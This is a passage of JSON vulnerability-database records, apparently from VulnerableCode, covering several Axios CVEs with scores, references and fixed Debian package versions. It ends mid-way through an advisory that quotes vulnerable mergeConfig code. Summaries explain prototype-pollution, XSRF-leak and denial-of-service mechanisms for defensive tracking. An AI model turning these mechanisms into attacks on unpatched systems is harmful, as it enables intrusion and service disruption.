g_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-27152"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1102223","reference_id":"1102223","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1102223"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2350618","reference_id":"2350618","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2350618"},{"reference_url":"https://github.com/advisories/GHSA-jr5f-v2jv-69x6","reference_id":"GHSA-jr5f-v2jv-69x6","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-jr5f-v2jv-69x6"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/932083?format=json","purl":"pkg:deb/debian/node-axios@1.8.4%2Bdfsg-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-kgnf-z6ca-tqgp"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-x41s-g5mh-pkdq"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.8.4%252Bdfsg-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932082?format=json","purl":"pkg:deb/debian/node-axios@1.14.0%2Bdfsg-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.14.0%252Bdfsg-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/1062504?format=json","purl":"pkg:deb/debian/node-axios@1.15.0-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.0-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/1077457?format=json","purl":"pkg:deb/debian/node-axios@1.15.2-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.2-1%3Fdistro=trixie"}],"aliases":["CVE-2025-27152","GHSA-jr5f-v2jv-69x6"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-hq6f-86aj-8yav"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/350545?format=json","vulnerability_id":"VCID-kgnf-z6ca-tqgp","summary":"Axios HTTP/2 Session Cleanup State Corruption Vulnerability","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-39865.json","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-39865.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-39865","reference_id":"","reference_type":"","scores":[{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.01675","published_at":"2026-04-13T12:55:00Z"},{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.01685","published_at":"2026-04-11T12:55:00Z"},{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.017","published_at":"2026-04-09T12:55:00Z"},{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02445","published_at":"2026-05-05T12:55:00Z"},{"value":"0.00015","scoring_system":"epss","scoring_elements":"0.031","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03544","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03412","published_at":"2026-04-16T12:55:00Z"},{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03542","published_at":"2026-04-21T12:55:00Z"},{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03423","published_at":"2026-04-18T12:55:00Z"},{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03538","published_at":"2026-04-24T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-39865"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-39865","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-39865"},{"reference_url":"https://github.com/axios/axios","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios"},{"reference_url":"https://github.com/axios/axios/releases/tag/v1.13.2","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-08T16:05:44Z/"}],"url":"https://github.com/axios/axios/releases/tag/v1.13.2"},{"reference_url":"https://github.com/axios/axios/commit/0588880ac7ddba7594ef179930493884b7e90bf5","reference_id":"0588880ac7ddba7594ef179930493884b7e90bf5","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-08T16:05:44Z/"}],"url":"https://github.com/axios/axios/commit/0588880ac7ddba7594ef179930493884b7e90bf5"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2456538","reference_id":"2456538","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2456538"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-39865","reference_id":"CVE-2026-39865","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-39865"},{"reference_url":"https://github.com/advisories/GHSA-qj83-cq47-w5f8","reference_id":"GHSA-qj83-cq47-w5f8","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qj83-cq47-w5f8"},{"reference_url":"https://github.com/axios/axios/security/advisories/GHSA-qj83-cq47-w5f8","reference_id":"GHSA-qj83-cq47-w5f8","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-08T16:05:44Z/"}],"url":"https://github.com/axios/axios/security/advisories/GHSA-qj83-cq47-w5f8"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/1059641?format=json","purl":"pkg:deb/debian/node-axios@1.13.2%2Bdfsg-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.13.2%252Bdfsg-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932082?format=json","purl":"pkg:deb/debian/node-axios@1.14.0%2Bdfsg-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.14.0%252Bdfsg-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/1062504?format=json","purl":"pkg:deb/debian/node-axios@1.15.0-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.0-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/1077457?format=json","purl":"pkg:deb/debian/node-axios@1.15.2-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.2-1%3Fdistro=trixie"}],"aliases":["CVE-2026-39865","GHSA-qj83-cq47-w5f8"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-kgnf-z6ca-tqgp"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/354415?format=json","vulnerability_id":"VCID-nmzm-1341-jfgt","summary":"Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.1 and 0.31.1, a prototype pollution gadget exists in the Axios HTTP adapter (lib/adapters/http.js) that allows an attacker to inject arbitrary HTTP headers into outgoing requests. The vulnerability exploits duck-type checking of the data payload, where if Object.prototype is polluted with getHeaders, append, pipe, on, once, and Symbol.toStringTag, Axios misidentifies any plain object payload as a FormData instance and calls the attacker-controlled getHeaders() function, merging the returned headers into the outgoing request. The vulnerable code resides exclusively in lib/adapters/http.js. The prototype pollution source does not need to originate from Axios itself — any prototype pollution primitive in any dependency in the application's dependency tree is sufficient to trigger this gadget. This vulnerability is fixed in 1.15.1 and 0.31.1.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42035.json","reference_id":"","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42035.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42035","reference_id":"","reference_type":"","scores":[{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.09688","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00063","scoring_system":"epss","scoring_elements":"0.19487","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00083","scoring_system":"epss","scoring_elements":"0.23971","published_at":"2026-05-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42035"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42035","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42035"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878","reference_id":"1134878","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2461606","reference_id":"2461606","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2461606"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42035","reference_id":"CVE-2026-42035","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42035"},{"reference_url":"https://github.com/advisories/GHSA-6chq-wfr3-2hj9","reference_id":"GHSA-6chq-wfr3-2hj9","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6chq-wfr3-2hj9"},{"reference_url":"https://github.com/axios/axios/security/advisories/GHSA-6chq-wfr3-2hj9","reference_id":"GHSA-6chq-wfr3-2hj9","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-24T18:07:43Z/"}],"url":"https://github.com/axios/axios/security/advisories/GHSA-6chq-wfr3-2hj9"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/1077457?format=json","purl":"pkg:deb/debian/node-axios@1.15.2-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.2-1%3Fdistro=trixie"}],"aliases":["CVE-2026-42035","GHSA-6chq-wfr3-2hj9"],"risk_score":3.4,"exploitability":"0.5","weighted_severity":"6.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-nmzm-1341-jfgt"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/354608?format=json","vulnerability_id":"VCID-p78g-vmhn-yyck","summary":"Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.1 and 0.31.1, the Axios library's XSRF token protection logic uses JavaScript truthy/falsy semantics instead of strict boolean comparison for the withXSRFToken config property. When this property is set to any truthy non-boolean value (via prototype pollution or misconfiguration), the same-origin check (isURLSameOrigin) is short-circuited, causing XSRF tokens to be sent to all request targets including cross-origin servers controlled by an attacker. This vulnerability is fixed in 1.15.1 and 0.31.1.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42042.json","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42042.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42042","reference_id":"","reference_type":"","scores":[{"value":"0.00028","scoring_system":"epss","scoring_elements":"0.07769","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00032","scoring_system":"epss","scoring_elements":"0.09172","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00035","scoring_system":"epss","scoring_elements":"0.10028","published_at":"2026-05-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42042"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42042","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42042"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878","reference_id":"1134878","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2461637","reference_id":"2461637","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2461637"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42042","reference_id":"CVE-2026-42042","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42042"},{"reference_url":"https://github.com/advisories/GHSA-xx6v-rp6x-q39c","reference_id":"GHSA-xx6v-rp6x-q39c","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-xx6v-rp6x-q39c"},{"reference_url":"https://github.com/axios/axios/security/advisories/GHSA-xx6v-rp6x-q39c","reference_id":"GHSA-xx6v-rp6x-q39c","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-27T17:35:32Z/"}],"url":"https://github.com/axios/axios/security/advisories/GHSA-xx6v-rp6x-q39c"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/1077457?format=json","purl":"pkg:deb/debian/node-axios@1.15.2-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.2-1%3Fdistro=trixie"}],"aliases":["CVE-2026-42042","GHSA-xx6v-rp6x-q39c"],"risk_score":2.8,"exploitability":"0.5","weighted_severity":"5.5","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-p78g-vmhn-yyck"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/354607?format=json","vulnerability_id":"VCID-tdwz-gg36-mkgs","summary":"Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.1 and 0.31.1, the encode() function in lib/helpers/AxiosURLSearchParams.js contains a character mapping (charMap) at line 21 that reverses the safe percent-encoding of null bytes. After encodeURIComponent('\\x00') correctly produces the safe sequence %00, the charMap entry '%00': '\\x00' converts it back to a raw null byte. Primary impact is limited because the standard axios request flow is not affected. This vulnerability is fixed in 1.15.1 and 0.31.1.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42040","reference_id":"","reference_type":"","scores":[{"value":"0.00029","scoring_system":"epss","scoring_elements":"0.08178","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.09718","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00044","scoring_system":"epss","scoring_elements":"0.13204","published_at":"2026-05-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42040"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42040","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42040"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878","reference_id":"1134878","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42040","reference_id":"CVE-2026-42040","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42040"},{"reference_url":"https://github.com/advisories/GHSA-xhjh-pmcv-23jw","reference_id":"GHSA-xhjh-pmcv-23jw","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-xhjh-pmcv-23jw"},{"reference_url":"https://github.com/axios/axios/security/advisories/GHSA-xhjh-pmcv-23jw","reference_id":"GHSA-xhjh-pmcv-23jw","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-27T13:48:02Z/"}],"url":"https://github.com/axios/axios/security/advisories/GHSA-xhjh-pmcv-23jw"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/1077457?format=json","purl":"pkg:deb/debian/node-axios@1.15.2-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.2-1%3Fdistro=trixie"}],"aliases":["CVE-2026-42040","GHSA-xhjh-pmcv-23jw"],"risk_score":1.6,"exploitability":"0.5","weighted_severity":"3.3","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-tdwz-gg36-mkgs"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/354419?format=json","vulnerability_id":"VCID-uuzj-ta8k-c3fn","summary":"Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.1 and 0.31.1, toFormData recursively walks nested objects with no depth limit, so a deeply nested value passed as request data crashes the Node.js process with a RangeError. This vulnerability is fixed in 1.15.1 and 0.31.1.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42039.json","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42039.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42039","reference_id":"","reference_type":"","scores":[{"value":"0.0004","scoring_system":"epss","scoring_elements":"0.11939","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00042","scoring_system":"epss","scoring_elements":"0.12828","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00052","scoring_system":"epss","scoring_elements":"0.16082","published_at":"2026-05-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42039"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42039","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42039"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878","reference_id":"1134878","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2461630","reference_id":"2461630","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2461630"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42039","reference_id":"CVE-2026-42039","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42039"},{"reference_url":"https://github.com/advisories/GHSA-62hf-57xw-28j9","reference_id":"GHSA-62hf-57xw-28j9","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-62hf-57xw-28j9"},{"reference_url":"https://github.com/axios/axios/security/advisories/GHSA-62hf-57xw-28j9","reference_id":"GHSA-62hf-57xw-28j9","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-24T18:14:11Z/"}],"url":"https://github.com/axios/axios/security/advisories/GHSA-62hf-57xw-28j9"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/1077457?format=json","purl":"pkg:deb/debian/node-axios@1.15.2-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.2-1%3Fdistro=trixie"}],"aliases":["CVE-2026-42039","GHSA-62hf-57xw-28j9"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-uuzj-ta8k-c3fn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/354416?format=json","vulnerability_id":"VCID-wbq8-z3qg-bfbt","summary":"Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.1 and 0.31.1, when responseType: 'stream' is used, Axios returns the response stream without enforcing maxContentLength. This bypasses configured response-size limits and allows unbounded downstream consumption. This vulnerability is fixed in 1.15.1 and 0.31.1.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42036.json","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42036.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42036","reference_id":"","reference_type":"","scores":[{"value":"0.00039","scoring_system":"epss","scoring_elements":"0.11525","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00039","scoring_system":"epss","scoring_elements":"0.11627","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.15633","published_at":"2026-05-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42036"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42036","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42036"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878","reference_id":"1134878","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2461633","reference_id":"2461633","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2461633"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42036","reference_id":"CVE-2026-42036","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42036"},{"reference_url":"https://github.com/advisories/GHSA-vf2m-468p-8v99","reference_id":"GHSA-vf2m-468p-8v99","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-vf2m-468p-8v99"},{"reference_url":"https://github.com/axios/axios/security/advisories/GHSA-vf2m-468p-8v99","reference_id":"GHSA-vf2m-468p-8v99","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-24T18:30:17Z/"}],"url":"https://github.com/axios/axios/security/advisories/GHSA-vf2m-468p-8v99"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/1077457?format=json","purl":"pkg:deb/debian/node-axios@1.15.2-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.2-1%3Fdistro=trixie"}],"aliases":["CVE-2026-42036","GHSA-vf2m-468p-8v99"],"risk_score":2.4,"exploitability":"0.5","weighted_severity":"4.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-wbq8-z3qg-bfbt"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/20921?format=json","vulnerability_id":"VCID-x41s-g5mh-pkdq","summary":"Axios is Vulnerable to Denial of Service via __proto__ Key in mergeConfig\n# Denial of Service via **proto** Key in mergeConfig\n\n### Summary\n\nThe `mergeConfig` function in axios crashes with a TypeError when processing configuration objects containing `__proto__` as an own property. An attacker can trigger this by providing a malicious configuration object created via `JSON.parse()`, causing complete denial of service.\n\n### Details\n\nThe vulnerability exists in `lib/core/mergeConfig.js` at lines 98-101:\n\n```javascript\nutils.forEach(Object.keys({ ...config1, ...config2 }), function computeConfigValue(prop) {\n const merge = mergeMap[prop] || mergeDeepProperties;\n const configValue = merge(config1[prop], config2[prop], prop);\n 